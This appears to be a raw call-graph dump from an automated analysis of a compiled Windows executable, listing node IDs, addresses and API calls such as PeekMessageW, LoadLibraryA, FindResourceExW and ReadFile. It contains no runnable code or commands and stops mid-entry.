7609f5 101938->101953 103522 7b9e4a 89 API calls 4 library calls 101939->103522 101941 760cfa 101941->101778 101943 760ee4 101943->101941 101945 760ef1 101943->101945 101946 760a4b PeekMessageW 102009 760a05 Mailbox 101946->102009 101950 794e81 Sleep 101950->102009 101952 760ce4 101952->101941 103519 761070 10 API calls Mailbox 101952->103519 101953->102009 103523 759e5d 60 API calls 101953->103523 103524 7a6349 341 API calls 101953->103524 101957 760ea5 TranslateMessage DispatchMessageW 101958 760e43 PeekMessageW 101957->101958 101958->102009 101959 794d50 TranslateAcceleratorW 101959->101958 101959->102009 101960 759e5d 60 API calls 101960->102009 101961 760d13 timeGetTime 101961->102009 101962 79581f WaitForSingleObject 101964 79583c GetExitCodeProcess CloseHandle 101962->101964 101962->102009 102000 760f95 101964->102000 101965 760e5f Sleep 101999 760e70 Mailbox 101965->101999 101966 758047 59 API calls 101966->102009 101967 757667 59 API calls 101967->101999 101968 795af8 Sleep 101968->101999 101970 770db6 59 API calls Mailbox 101970->102009 101971 75b73c 314 API calls 101971->102009 101973 77049f timeGetTime 101973->101999 101974 760f4e timeGetTime 103521 759e5d 60 API calls 101974->103521 101977 795b8f GetExitCodeProcess 101981 795bbb CloseHandle 101977->101981 101982 795ba5 WaitForSingleObject 101977->101982 101979 7d5f25 110 API calls 101979->101999 101980 75b7dd 109 API calls 101980->101999 101981->101999 101982->101981 101982->102009 101985 795874 101985->102000 101986 795078 Sleep 101986->102009 101987 795c17 Sleep 101987->102009 101989 757de1 59 API calls 101989->101999 101993 759ea0 314 API calls 101993->102009 101999->101967 101999->101973 101999->101977 101999->101979 101999->101980 101999->101985 101999->101986 101999->101987 101999->101989 101999->102000 101999->102009 103549 7b2408 60 API calls 101999->103549 103550 759e5d 60 API calls 101999->103550 103551 7589b3 69 API calls Mailbox 101999->103551 103552 75b73c 341 API calls 101999->103552 103553 7a64da 60 API calls 101999->103553 103554 7b5244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 101999->103554 103555 7b3c55 66 API calls Mailbox 101999->103555 102000->101778 102001 7b9e4a 89 API calls 102001->102009 102002 7584c0 69 API calls 102002->102009 102004 759c90 59 API calls Mailbox 102004->102009 102005 7a617e 59 API calls Mailbox 102005->102009 102007 757de1 59 API calls 102007->102009 102008 7589b3 69 API calls 102008->102009 102009->101946 102009->101950 102009->101952 102009->101957 102009->101958 102009->101959 102009->101960 102009->101961 102009->101962 102009->101965 102009->101966 102009->101968 102009->101970 102009->101971 102009->101974 102009->101993 102009->101999 102009->102000 102009->102001 102009->102002 102009->102004 102009->102005 102009->102007 102009->102008 102010 7955d5 VariantClear 102009->102010 102011 7a6e8f 59 API calls 102009->102011 102012 79566b VariantClear 102009->102012 102013 758cd4 59 API calls Mailbox 102009->102013 102014 795419 VariantClear 102009->102014 103380 75e420 102009->103380 103387 75e6a0 102009->103387 103418 75f460 102009->103418 103438 75fce0 102009->103438 103518 7531ce IsDialogMessageW GetClassLongW 102009->103518 103525 7d6018 59 API calls 102009->103525 103526 7b9a15 59 API calls Mailbox 102009->103526 103527 7ad4f2 59 API calls 102009->103527 103528 759837 102009->103528 103546 7a60ef 59 API calls 2 library calls 102009->103546 103547 758401 59 API calls 102009->103547 103548 7582df 59 API calls Mailbox 102009->103548 102010->102009 102011->102009 102012->102009 102013->102009 102014->102009 102015->101780 102016->101758 102017->101768 102019 781940 __ftell_nolock 102018->102019 102020 754713 GetModuleFileNameW 102019->102020 102021 757de1 59 API calls 102020->102021 102022 754739 102021->102022 102023 754750 60 API calls 102022->102023 102024 754743 Mailbox 102023->102024 102024->101777 102026 757df0 __wsetenvp _memmove 102025->102026 102027 770db6 Mailbox 59 API calls 102026->102027 102028 757e2e 102027->102028 102028->101781 102046 753d3e __ftell_nolock 102045->102046 102047 757bcc 59 API calls 102046->102047 102052 753ea4 Mailbox 102046->102052 102049 753d70 102047->102049 102058 753da6 Mailbox 102049->102058 102171 7579f2 102049->102171 102050 7579f2 59 API calls 102050->102058 102051 753e77 102051->102052 102053 757de1 59 API calls 102051->102053 102052->101801 102055 753e98 102053->102055 102054 757de1 59 API calls 102054->102058 102056 753f74 59 API calls 102055->102056 102056->102052 102058->102050 102058->102051 102058->102052 102058->102054 102174 753f74 102058->102174 102184 754bb5 102059->102184 102064 754e08 LoadLibraryExW 102194 754b6a 102064->102194 102065 78d8e6 102067 754e4a 84 API calls 102065->102067 102068 78d8ed 102067->102068 102070 754b6a 3 API calls 102068->102070 102072 78d8f5 102070->102072 102220 754f0b 102072->102220 102073 754e2f 102073->102072 102074 754e3b 102073->102074 102076 754e4a 84 API calls 102074->102076 102078 7537d4 102076->102078 102078->101808 102078->101809 102080 78d91c 102228 754ec7 102080->102228 102082 78d929 102084 758052 102083->102084 102085 7537ef 102083->102085 102658 757f77 102084->102658 102087 75928a 102085->102087 102088 770db6 Mailbox 59 API calls 102087->102088 102089 7537fb 102088->102089 102089->101822 102091 7584cb 102090->102091 102092 7584f2 102091->102092 102662 7589b3 69 API calls Mailbox 102091->102662 102092->101826 102095 753ef3 102094->102095 102096 753eda 102094->102096 102098 757bcc 59 API calls 102095->102098 102097 758047 59 API calls 102096->102097 102099 753879 102097->102099 102098->102099 102100 772efd 102099->102100 102101 772f7e 102100->102101 102102 772f09 102100->102102 102665 772f90 60 API calls 3 library calls 102101->102665 102109 772f2e 102102->102109 102663 778b28 58 API calls __getptd_noexit 102102->102663 102105 772f8b 102105->101846 102106 772f15 102664 778db6 9 API calls __cftoe_l 102106->102664 102108 772f20 102108->101846 102109->101846 102111 7592d6 102110->102111 102112 770db6 Mailbox 59 API calls 102111->102112 102113 7592e4 102112->102113 102114 753924 102113->102114 102666 7591fc 59 API calls Mailbox 102113->102666 102116 759050 102114->102116 102667 759160 102116->102667 102118 75905f 102119 770db6 Mailbox 59 API calls 102118->102119 102120 753932 102118->102120 102119->102120 102121 758ee0 102120->102121 102122 78f17c 102121->102122 102129 758ef7 102121->102129 102122->102129 102677 758bdb 59 API calls Mailbox 102122->102677 102124 758fff 102124->101875 102125 759040 102676 759d3c 60 API calls Mailbox 102125->102676 102126 758ff8 102127 770db6 Mailbox 59 API calls 102126->102127 102127->102124 102129->102124 102129->102125 102129->102126 102131 754ee5 85 API calls 102130->102131 102132 7b95ca 102131->102132 102678 7b9734 102132->102678 102135 754f0b 74 API calls 102136 7b95f7 102135->102136 102137 754f0b 74 API calls 102136->102137 102138 7b9607 102137->102138 102139 754f0b 74 API calls 102138->102139 102140 7b9622 102139->102140 102141 754f0b 74 API calls 102140->102141 102142 7b963d 102141->102142 102143 754ee5 85 API calls 102142->102143 102144 7b9654 102143->102144 102145 77571c __crtLCMapStringA_stat 58 API calls 102144->102145 102146 7b965b 102145->102146 102147 77571c __crtLCMapStringA_stat 58 API calls 102146->102147 102148 7b9665 102147->102148 102149 754f0b 74 API calls 102148->102149 102150 7b9679 102149->102150 102151 7b9109 GetSystemTimeAsFileTime 102150->102151 102152 7b968c 102151->102152 102153 7b96a1 102152->102153 102154 7b96b6 102152->102154 102155 772d55 _free 58 API calls 102153->102155 102156 7b971b 102154->102156 102157 7b96bc 102154->102157 102158 7b96a7 102155->102158 102160 772d55 _free 58 API calls 102156->102160 102684 7b8b06 102157->102684 102161 772d55 _free 58 API calls 102158->102161 102163 78d186 102160->102163 102161->102163 102163->101812 102165 754e4a 102163->102165 102164 772d55 _free 58 API calls 102164->102163 102166 754e54 102165->102166 102168 754e5b 102165->102168 102167 7753a6 __fcloseall 83 API calls 102166->102167 102167->102168 102169 754e7b FreeLibrary 102168->102169 102170 754e6a 102168->102170 102169->102170 102170->101812 102180 757e4f 102171->102180 102173 7579fd 102173->102049 102175 753f82 102174->102175 102179 753fa4 _memmove 102174->102179 102177 770db6 Mailbox 59 API calls 102175->102177 102176 770db6 Mailbox 59 API calls 102178 753fb8 102176->102178 102177->102179 102178->102058 102179->102176 102181 757e62 102180->102181 102183 757e5f _memmove 102180->102183 102182 770db6 Mailbox 59 API calls 102181->102182 102182->102183 102183->102173 102233 754c03 102184->102233 102187 754bdc 102189 754bf5 102187->102189 102190 754bec FreeLibrary 102187->102190 102188 754c03 2 API calls 102188->102187 102191 77525b 102189->102191 102190->102189 102237 775270 102191->102237 102193 754dfc 102193->102064 102193->102065 102395 754c36 102194->102395 102197 754ba1 FreeLibrary 102198 754baa 102197->102198 102201 754c70 102198->102201 102199 754c36 2 API calls 102200 754b8f 102199->102200 102200->102197 102200->102198 102202 770db6 Mailbox 59 API calls 102201->102202 102203 754c85 102202->102203 102399 75522e 102203->102399 102205 754c91 _memmove 102206 754ccc 102205->102206 102207 754dc1 102205->102207 102208 754d89 102205->102208 102209 754ec7 69 API calls 102206->102209 102413 7b991b 95 API calls 102207->102413 102402 754e89 CreateStreamOnHGlobal 102208->102402 102216 754cd5 102209->102216 102212 754f0b 74 API calls 102212->102216 102213 754d69 102213->102073 102215 78d8a7 102217 754ee5 85 API calls 102215->102217 102216->102212 102216->102213 102216->102215 102408 754ee5 102216->102408 102218 78d8bb 102217->102218 102219 754f0b 74 API calls 102218->102219 102219->102213 102221 78d9cd 102220->102221 102222 754f1d 102220->102222 102437 7755e2 102222->102437 102225 7b9109 102635 7b8f5f 102225->102635 102227 7b911f 102227->102080 102229 754ed6 102228->102229 102230 78d990 102228->102230 102640 775c60 102229->102640 102232 754ede 102232->102082 102234 754bd0 102233->102234 102235 754c0c LoadLibraryA 102233->102235 102234->102187 102234->102188 102235->102234 102236 754c1d GetProcAddress 102235->102236 102236->102234 102240 77527c type_info::_Type_info_dtor 102237->102240 102238 77528f 102286 778b28 58 API calls __getptd_noexit 102238->102286 102240->102238 102242 7752c0 102240->102242 102241 775294 102287 778db6 9 API calls __cftoe_l 102241->102287 102256 7804e8 102242->102256 102245 7752c5 102246 7752ce 102245->102246 102247 7752db 102245->102247 102288 778b28 58 API calls __getptd_noexit 102246->102288 102249 775305 102247->102249 102250 7752e5 102247->102250 102271 780607 102249->102271 102289 778b28 58 API calls __getptd_noexit 102250->102289 102253 77529f type_info::_Type_info_dtor @_EH4_CallFilterFunc@8 102253->102193 102257 7804f4 type_info::_Type_info_dtor 102256->102257 102258 779c0b __lock 58 API calls 102257->102258 102259 780502 102258->102259 102260 78057d 102259->102260 102266 779c93 __mtinitlocknum 58 API calls 102259->102266 102269 780576 102259->102269 102294 776c50 59 API calls __lock 102259->102294 102295 776cba LeaveCriticalSection LeaveCriticalSection _doexit 102259->102295 102296 77881d 58 API calls 2 library calls 102260->102296 102263 7805f3 type_info::_Type_info_dtor 102263->102245 102264 780584 102264->102269 102297 779e2b InitializeCriticalSectionAndSpinCount 102264->102297 102266->102259 102268 7805aa EnterCriticalSection 102268->102269 102291 7805fe 102269->102291 102280 780627 __wopenfile 102271->102280 102272 780641 102302 778b28 58 API calls __getptd_noexit 102272->102302 102274 7807fc 102274->102272 102278 78085f 102274->102278 102275 780646 102303 778db6 9 API calls __cftoe_l 102275->102303 102277 775310 102290 775332 LeaveCriticalSection LeaveCriticalSection __wfsopen 102277->102290 102299 7885a1 102278->102299 102280->102272 102280->102274 102280->102280 102304 7737cb 60 API calls 2 library calls 102280->102304 102282 7807f5 102282->102274 102305 7737cb 60 API calls 2 library calls 102282->102305 102284 780814 102284->102274 102306 7737cb 60 API calls 2 library calls 102284->102306 102286->102241 102287->102253 102288->102253 102289->102253 102290->102253 102298 779d75 LeaveCriticalSection 102291->102298 102293 780605 102293->102263 102294->102259 102295->102259 102296->102264 102297->102268 102298->102293 102307 787d85 102299->102307 102301 7885ba 102301->102277 102302->102275 102303->102277 102304->102282 102305->102284 102306->102274 102310 787d91 type_info::_Type_info_dtor 102307->102310 102308 787da7 102392 778b28 58 API calls __getptd_noexit 102308->102392 102310->102308 102312 787ddd 102310->102312 102311 787dac 102393 778db6 9 API calls __cftoe_l 102311->102393 102318 787e4e 102312->102318 102315 787df9 102394 787e22 LeaveCriticalSection __unlock_fhandle 102315->102394 102317 787db6 type_info::_Type_info_dtor 102317->102301 102319 787e6e 102318->102319 102320 7744ea __wsopen_nolock 58 API calls 102319->102320 102324 787e8a 102320->102324 102321 787fc1 102322 778dc6 __invoke_watson 8 API calls 102321->102322 102323 7885a0 102322->102323 102326 787d85 __wsopen_helper 103 API calls 102323->102326 102324->102321 102325 787ec4 102324->102325 102332 787ee7 102324->102332 102327 778af4 __chsize_nolock 58 API calls 102325->102327 102328 7885ba 102326->102328 102329 787ec9 102327->102329 102328->102315 102330 778b28 __cftoe_l 58 API calls 102329->102330 102331 787ed6 102330->102331 102334 778db6 __cftoe_l 9 API calls 102331->102334 102333 787fa5 102332->102333 102341 787f83 102332->102341 102335 778af4 __chsize_nolock 58 API calls 102333->102335 102336 787ee0 102334->102336 102337 787faa 102335->102337 102336->102315 102338 778b28 __cftoe_l 58 API calls 102337->102338 102339 787fb7 102338->102339 102340 778db6 __cftoe_l 9 API calls 102339->102340 102340->102321 102342 77d294 __alloc_osfhnd 61 API calls 102341->102342 102343 788051 102342->102343 102344 78805b 102343->102344 102345 78807e 102343->102345 102347 778af4 __chsize_nolock 58 API calls 102344->102347 102346 787cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 102345->102346 102356 7880a0 102346->102356 102348 788060 102347->102348 102350 778b28 __cftoe_l 58 API calls 102348->102350 102349 78811e GetFileType 102351 788129 GetLastError 102349->102351 102352 78816b 102349->102352 102354 78806a 102350->102354 102355 778b07 __dosmaperr 58 API calls 102351->102355 102364 77d52a __set_osfhnd 59 API calls 102352->102364 102353 7880ec GetLastError 102357 778b07 __dosmaperr 58 API calls 102353->102357 102358 778b28 __cftoe_l 58 API calls 102354->102358 102359 788150 CloseHandle 102355->102359 102356->102349 102356->102353 102360 787cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 102356->102360 102361 788111 102357->102361 102358->102336 102359->102361 102362 78815e 102359->102362 102363 7880e1 102360->102363 102366 778b28 __cftoe_l 58 API calls 102361->102366 102365 778b28 __cftoe_l 58 API calls 102362->102365 102363->102349 102363->102353 102369 788189 102364->102369 102367 788163 102365->102367 102366->102321 102367->102361 102368 788344 102368->102321 102372 788517 CloseHandle 102368->102372 102369->102368 102370 7818c1 __lseeki64_nolock 60 API calls 102369->102370 102387 78820a 102369->102387 102371 7881f3 102370->102371 102375 778af4 __chsize_nolock 58 API calls 102371->102375 102371->102387 102373 787cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 102372->102373 102374 78853e 102373->102374 102376 788572 102374->102376 102377 788546 GetLastError 102374->102377 102375->102387 102376->102321 102378 778b07 __dosmaperr 58 API calls 102377->102378 102379 788552 102378->102379 102383 77d43d __free_osfhnd 59 API calls 102379->102383 102380 780add __close_nolock 61 API calls 102380->102387 102381 780e5b 70 API calls __read_nolock 102381->102387 102382 78823c 102384 7897a2 __chsize_nolock 82 API calls 102382->102384 102382->102387 102383->102376 102384->102382 102385 77d886 __write 78 API calls 102385->102387 102386 7883c1 102388 780add __close_nolock 61 API calls 102386->102388 102387->102368 102387->102380 102387->102381 102387->102382 102387->102385 102387->102386 102391 7818c1 60 API calls __lseeki64_nolock 102387->102391 102389 7883c8 102388->102389 102390 778b28 __cftoe_l 58 API calls 102389->102390 102390->102321 102391->102387 102392->102311 102393->102317 102394->102317 102396 754b83 102395->102396 102397 754c3f LoadLibraryA 102395->102397 102396->102199 102396->102200 102397->102396 102398 754c50 GetProcAddress 102397->102398 102398->102396 102400 770db6 Mailbox 59 API calls 102399->102400 102401 755240 102400->102401 102401->102205 102403 754ea3 FindResourceExW 102402->102403 102407 754ec0 102402->102407 102404 78d933 LoadResource 102403->102404 102403->102407 102405 78d948 SizeofResource 102404->102405 102404->102407 102406 78d95c LockResource 102405->102406 102405->102407 102406->102407 102407->102206 102409 754ef4 102408->102409 102410 78d9ab 102408->102410 102414 77584d 102409->102414 102412 754f02 102412->102216 102413->102206 102416 775859 type_info::_Type_info_dtor 102414->102416 102415 77586b 102427 778b28 58 API calls __getptd_noexit 102415->102427 102416->102415 102417 775891 102416->102417 102429 776c11 102417->102429 102420 775870 102428 778db6 9 API calls __cftoe_l 102420->102428 102422 775897 102435 7757be 83 API calls 4 library calls 102422->102435 102424 7758a6 102436 7758c8 LeaveCriticalSection LeaveCriticalSection __wfsopen 102424->102436 102426 77587b type_info::_Type_info_dtor 102426->102412 102427->102420 102428->102426 102430 776c43 EnterCriticalSection 102429->102430 102431 776c21 102429->102431 102432 776c39 102430->102432 102431->102430 102433 776c29 102431->102433 102432->102422 102434 779c0b __lock 58 API calls 102433->102434 102434->102432 102435->102424 102436->102426 102440 7755fd 102437->102440 102439 754f2e 102439->102225 102441 775609 type_info::_Type_info_dtor 102440->102441 102442 77564c 102441->102442 102443 77561f _memset 102441->102443 102452 775644 type_info::_Type_info_dtor 102441->102452 102444 776c11 __lock_file 59 API calls 102442->102444 102467 778b28 58 API calls __getptd_noexit 102443->102467 102446 775652 102444->102446 102453 77541d 102446->102453 102448 775639 102468 778db6 9 API calls __cftoe_l 102448->102468 102452->102439 102454 775453 102453->102454 102457 775438 _memset 102453->102457 102469 775686 LeaveCriticalSection LeaveCriticalSection __wfsopen 102454->102469 102455 775443 102565 778b28 58 API calls __getptd_noexit 102455->102565 102457->102454 102457->102455 102460 775493 102457->102460 102460->102454 102461 7755a4 _memset 102460->102461 102470 7746e6 102460->102470 102477 780e5b 102460->102477 102545 780ba7 102460->102545 102567 780cc8 58 API calls 3 library calls 102460->102567 102568 778b28 58 API calls __getptd_noexit 102461->102568 102466 775448 102566 778db6 9 API calls __cftoe_l 102466->102566 102467->102448 102468->102452 102469->102452 102471 774705 102470->102471 102472 7746f0 102470->102472 102471->102460 102569 778b28 58 API calls __getptd_noexit 102472->102569 102474 7746f5 102570 778db6 9 API calls __cftoe_l 102474->102570 102476 774700 102476->102460 102478 780e7c 102477->102478 102479 780e93 102477->102479 102580 778af4 58 API calls __getptd_noexit 102478->102580 102481 7815cb 102479->102481 102485 780ecd 102479->102485 102596 778af4 58 API calls __getptd_noexit 102481->102596 102482 780e81 102581 778b28 58 API calls __getptd_noexit 102482->102581 102487 780ed5 102485->102487 102493 780eec 102485->102493 102486 7815d0 102597 778b28 58 API calls __getptd_noexit 102486->102597 102582 778af4 58 API calls __getptd_noexit 102487->102582 102489 780ee1 102598 778db6 9 API calls __cftoe_l 102489->102598 102491 780eda 102583 778b28 58 API calls __getptd_noexit 102491->102583 102494 780f01 102493->102494 102496 780f1b 102493->102496 102498 780f39 102493->102498 102525 780e88 102493->102525 102584 778af4 58 API calls __getptd_noexit 102494->102584 102496->102494 102502 780f26 102496->102502 102585 77881d 58 API calls 2 library calls 102498->102585 102500 780f49 102503 780f6c 102500->102503 102504 780f51 102500->102504 102571 785c6b 102502->102571 102588 7818c1 60 API calls 3 library calls 102503->102588 102586 778b28 58 API calls __getptd_noexit 102504->102586 102505 78103a 102507 7810b3 ReadFile 102505->102507 102512 781050 GetConsoleMode 102505->102512 102510 781593 GetLastError 102507->102510 102511 7810d5 102507->102511 102509 780f56 102587 778af4 58 API calls __getptd_noexit 102509->102587 102514 7815a0 102510->102514 102515 781093 102510->102515 102511->102510 102519 7810a5 102511->102519 102516 7810b0 102512->102516 102517 781064 102512->102517 102594 778b28 58 API calls __getptd_noexit 102514->102594 102527 781099 102515->102527 102589 778b07 58 API calls 3 library calls 102515->102589 102516->102507 102517->102516 102520 78106a ReadConsoleW 102517->102520 102519->102527 102528 78110a 102519->102528 102537 781377 102519->102537 102520->102519 102522 78108d GetLastError 102520->102522 102521 7815a5 102595 778af4 58 API calls __getptd_noexit 102521->102595 102522->102515 102525->102460 102526 772d55 _free 58 API calls 102526->102525 102527->102525 102527->102526 102529 781176 ReadFile 102528->102529 102535 7811f7 102528->102535 102531 781197 GetLastError 102529->102531 102539 7811a1 102529->102539 102531->102539 102532 7812b4 102541 781264 MultiByteToWideChar 102532->102541 102592 7818c1 60 API calls 3 library calls 102532->102592 102533 7812a4 102591 778b28 58 API calls __getptd_noexit 102533->102591 102534 78147d ReadFile 102538 7814a0 GetLastError 102534->102538 102544 7814ae 102534->102544 102535->102527 102535->102532 102535->102533 102535->102541 102537->102527 102537->102534 102538->102544 102539->102528 102590 7818c1 60 API calls 3 library calls 102539->102590 102541->102522 102541->102527 102544->102537 102593 7818c1 60 API calls 3 library calls 102544->102593 102546 780bb2 102545->102546 102547 780bc7 102545->102547 102632 778b28 58 API calls __getptd_noexit 102546->102632 102551 780bfc 102547->102551 102557 780bc2 102547->102557 102634 785fe4 58 API calls __malloc_crt 102547->102634 102549 780bb7 102633 778db6 9 API calls __cftoe_l 102549->102633 102553 7746e6 __ftell_nolock 58 API calls 102551->102553 102554 780c10 102553->102554 102599 780d47 102554->102599 102556 780c17 102556->102557 102558 7746e6 __ftell_nolock 58 API calls 102556->102558 102557->102460 102559 780c3a 102558->102559 102559->102557 102560 7746e6 __ftell_nolock 58 API calls 102559->102560 102561 780c46 102560->102561 102561->102557 102562 7746e6 __ftell_nolock 58 API calls 102561->102562 102563 780c53 102562->102563 102564 7746e6 __ftell_nolock 58 API calls 102563->102564 102564->102557 102565->102466 102566->102454 102567->102460 102568->102466 102569->102474 102570->102476 102572 785c83 102571->102572 102573 785c76 102571->102573 102575 785c8f 102572->102575 102576 778b28 __cftoe_l 58 API calls 102572->102576 102574 778b28 __cftoe_l 58 API calls 102573->102574 102577 785c7b 102574->102577 102575->102505 102578 785cb0 102576->102578 102577->102505 102579 778db6 __cftoe_l 9 API calls 102578->102579 102579->102577 102580->102482 102581->102525 102582->102491 102583->102489 102584->102491 102585->102500 102586->102509 102587->102525 102588->102502 102589->102527 102590->102539 102591->102527 102592->102541 102593->102544 102594->102521 102595->102527 102596->102486 102597->102489 102598->102525 102600 780d53 type_info::_Type_info_dtor 102599->102600 102601 780d60 102600->102601 102602 780d77 102600->102602 102603 778af4 __chsize_nolock 58 API calls 102601->102603 102604 780e3b 102602->102604 102607 780d8b 102602->102607 102606 780d65 102603->102606 102605 778af4 __chsize_nolock 58 API calls 102604->102605 102614 780dae 102605->102614 102608 778b28 __cftoe_l 58 API calls 102606->102608 102609 780da9 102607->102609 102610 780db6 102607->102610 102621 780d6c type_info::_Type_info_dtor 102608->102621 102611 778af4 __chsize_nolock 58 API calls 102609->102611 102612 780dd8 102610->102612 102613 780dc3 102610->102613 102611->102614 102616 77d206 ___lock_fhandle 59 API calls 102612->102616 102615 778af4 __chsize_nolock 58 API calls 102613->102615 102617 778b28 __cftoe_l 58 API calls 102614->102617 102618 780dc8 102615->102618 102619 780dde 102616->102619 102620 780dd0 102617->102620 102622 778b28 __cftoe_l 58 API calls 102618->102622 102623 780df1 102619->102623 102624 780e04 102619->102624 102626 778db6 __cftoe_l 9 API calls 102620->102626 102621->102556 102622->102620 102625 780e5b __read_nolock 70 API calls 102623->102625 102627 778b28 __cftoe_l 58 API calls 102624->102627 102629 780dfd 102625->102629 102626->102621 102628 780e09 102627->102628 102630 778af4 __chsize_nolock 58 API calls 102628->102630 102631 780e33 __read LeaveCriticalSection 102629->102631 102630->102629 102631->102621 102632->102549 102633->102557 102634->102551 102638 77520a GetSystemTimeAsFileTime 102635->102638 102637 7b8f6e 102637->102227 102639 775238 __aulldiv 102638->102639 102639->102637 102641 775c6c type_info::_Type_info_dtor 102640->102641 102642 775c93 102641->102642 102643 775c7e 102641->102643 102644 776c11 __lock_file 59 API calls 102642->102644 102654 778b28 58 API calls __getptd_noexit 102643->102654 102647 775c99 102644->102647 102646 775c83 102655 778db6 9 API calls __cftoe_l 102646->102655 102656 7758d0 67 API calls 5 library calls 102647->102656 102650 775ca4 102657 775cc4 LeaveCriticalSection LeaveCriticalSection __wfsopen 102650->102657 102652 775cb6 102653 775c8e type_info::_Type_info_dtor 102652->102653 102653->102232 102654->102646 102655->102653 102656->102650 102657->102652 102659 757f9a _memmove 102658->102659 102660 757f87 102658->102660 102659->102085 102660->102659 102661 770db6 Mailbox 59 API calls 102660->102661 102661->102659 102662->102092 102663->102106 102664->102108 102665->102105 102666->102114 102668 759169 Mailbox 102667->102668 102669 78f19f 102668->102669 102674 759173 102668->102674 102670 770db6 Mailbox 59 API calls 102669->102670 102672 78f1ab 102670->102672 102671 75917a 102671->102118 102674->102671 102675 759c90 59 API calls Mailbox 102674->102675 102675->102674 102676->102124 102677->102129 102683 7b9748 __tzset_nolock _wcscmp 102678->102683 102679 754f0b 74 API calls 102679->102683 102680 7b95dc 102680->102135 102680->102163 102681 7b9109 GetSystemTimeAsFileTime 102681->102683 102682 754ee5 85 API calls 102682->102683 102683->102679 102683->102680 102683->102681 102683->102682 102685 7b8b11 102684->102685 102686 7b8b1f 102684->102686 102687 77525b 115 API calls 102685->102687 102688 7b8b64 102686->102688 102689 77525b 115 API calls 102686->102689 102714 7b8b28 102686->102714 102687->102686 102715 7b8d91 102688->102715 102691 7b8b49 102689->102691 102691->102688 102693 7b8b52 102691->102693 102692 7b8ba8 102694 7b8bcd 102692->102694 102698 7b8bac 102692->102698 102695 7753a6 __fcloseall 83 API calls 102693->102695 102693->102714 102719 7b89a9 102694->102719 102695->102714 102697 7b8bb9 102703 7753a6 __fcloseall 83 API calls 102697->102703 102697->102714 102698->102697 102700 7753a6 __fcloseall 83 API calls 102698->102700 102700->102697 102701 7b8bfb 102728 7b8c2b 102701->102728 102702 7b8bdb 102704 7b8be8 102702->102704 102706 7753a6 __fcloseall 83 API calls 102702->102706 102703->102714 102709 7753a6 __fcloseall 83 API calls 102704->102709 102704->102714 102706->102704 102709->102714 102711 7b8c16 102713 7753a6 __fcloseall 83 API calls 102711->102713 102711->102714 102713->102714 102714->102164 102716 7b8db6 102715->102716 102718 7b8d9f __tzset_nolock _memmove 102715->102718 102717 7755e2 __fread_nolock 74 API calls 102716->102717 102717->102718 102718->102692 102720 77571c __crtLCMapStringA_stat 58 API calls 102719->102720 102721 7b89b8 102720->102721 102722 77571c __crtLCMapStringA_stat 58 API calls 102721->102722 102723 7b89cc 102722->102723 102724 77571c __crtLCMapStringA_stat 58 API calls 102723->102724 102725 7b89e0 102724->102725 102726 7b8d0d 58 API calls 102725->102726 102727 7b89f3 102725->102727 102726->102727 102727->102701 102727->102702 102732 7b8c40 102728->102732 102729 7b8cf8 102761 7b8f35 102729->102761 102731 7b8a05 74 API calls 102731->102732 102732->102729 102732->102731 102735 7b8c02 102732->102735 102757 7b8e12 102732->102757 102765 7b8aa1 74 API calls 102732->102765 102736 7b8d0d 102735->102736 102737 7b8d1a 102736->102737 102738 7b8d20 102736->102738 102740 772d55 _free 58 API calls 102737->102740 102739 7b8d31 102738->102739 102741 772d55 _free 58 API calls 102738->102741 102742 7b8c09 102739->102742 102743 772d55 _free 58 API calls 102739->102743 102740->102738 102741->102739 102742->102711 102744 7753a6 102742->102744 102743->102742 102745 7753b2 type_info::_Type_info_dtor 102744->102745 102746 7753c6 102745->102746 102747 7753de 102745->102747 102814 778b28 58 API calls __getptd_noexit 102746->102814 102749 776c11 __lock_file 59 API calls 102747->102749 102753 7753d6 type_info::_Type_info_dtor 102747->102753 102751 7753f0 102749->102751 102750 7753cb 102815 778db6 9 API calls __cftoe_l 102750->102815 102798 77533a 102751->102798 102753->102711 102758 7b8e21 102757->102758 102759 7b8e61 102757->102759 102758->102732 102759->102758 102766 7b8ee8 102759->102766 102762 7b8f53 102761->102762 102763 7b8f42 102761->102763 102762->102735 102764 774863 80 API calls 102763->102764 102764->102762 102765->102732 102767 7b8f25 102766->102767 102768 7b8f14 102766->102768 102767->102759 102770 774863 102768->102770 102771 77486f type_info::_Type_info_dtor 102770->102771 102772 7748a5 102771->102772 102773 77488d 102771->102773 102774 77489d type_info::_Type_info_dtor 102771->102774 102775 776c11 __lock_file 59 API calls 102772->102775 102795 778b28 58 API calls __getptd_noexit 102773->102795 102774->102767 102777 7748ab 102775->102777 102783 77470a 102777->102783 102778 774892 102796 778db6 9 API calls __cftoe_l 102778->102796 102786 774719 102783->102786 102789 774737 102783->102789 102784 774727 102785 778b28 __cftoe_l 58 API calls 102784->102785 102787 77472c 102785->102787 102786->102784 102786->102789 102792 774751 _memmove 102786->102792 102788 778db6 __cftoe_l 9 API calls 102787->102788 102788->102789 102797 7748dd LeaveCriticalSection LeaveCriticalSection __wfsopen 102789->102797 102790 77ae1e __flsbuf 78 API calls 102790->102792 102791 774a3d __flush 78 API calls 102791->102792 102792->102789 102792->102790 102792->102791 102793 7746e6 __ftell_nolock 58 API calls 102792->102793 102794 77d886 __write 78 API calls 102792->102794 102793->102792 102794->102792 102795->102778 102796->102774 102797->102774 102799 77535d 102798->102799 102800 775349 102798->102800 102802 775359 102799->102802 102817 774a3d 102799->102817 102853 778b28 58 API calls __getptd_noexit 102800->102853 102816 775415 LeaveCriticalSection LeaveCriticalSection __wfsopen 102802->102816 102803 77534e 102854 778db6 9 API calls __cftoe_l 102803->102854 102809 7746e6 __ftell_nolock 58 API calls 102810 775377 102809->102810 102827 780a02 102810->102827 102812 77537d 102812->102802 102813 772d55 _free 58 API calls 102812->102813 102813->102802 102814->102750 102815->102753 102816->102753 102818 774a74 102817->102818 102819 774a50 102817->102819 102823 780b77 102818->102823 102819->102818 102820 7746e6 __ftell_nolock 58 API calls 102819->102820 102821 774a6d 102820->102821 102855 77d886 102821->102855 102824 775371 102823->102824 102825 780b84 102823->102825 102824->102809 102825->102824 102826 772d55 _free 58 API calls 102825->102826 102826->102824 102828 780a0e type_info::_Type_info_dtor 102827->102828 102829 780a1b 102828->102829 102830 780a32 102828->102830 102980 778af4 58 API calls __getptd_noexit 102829->102980 102832 780abd 102830->102832 102835 780a42 102830->102835 102985 778af4 58 API calls __getptd_noexit 102832->102985 102834 780a20 102981 778b28 58 API calls __getptd_noexit 102834->102981 102836 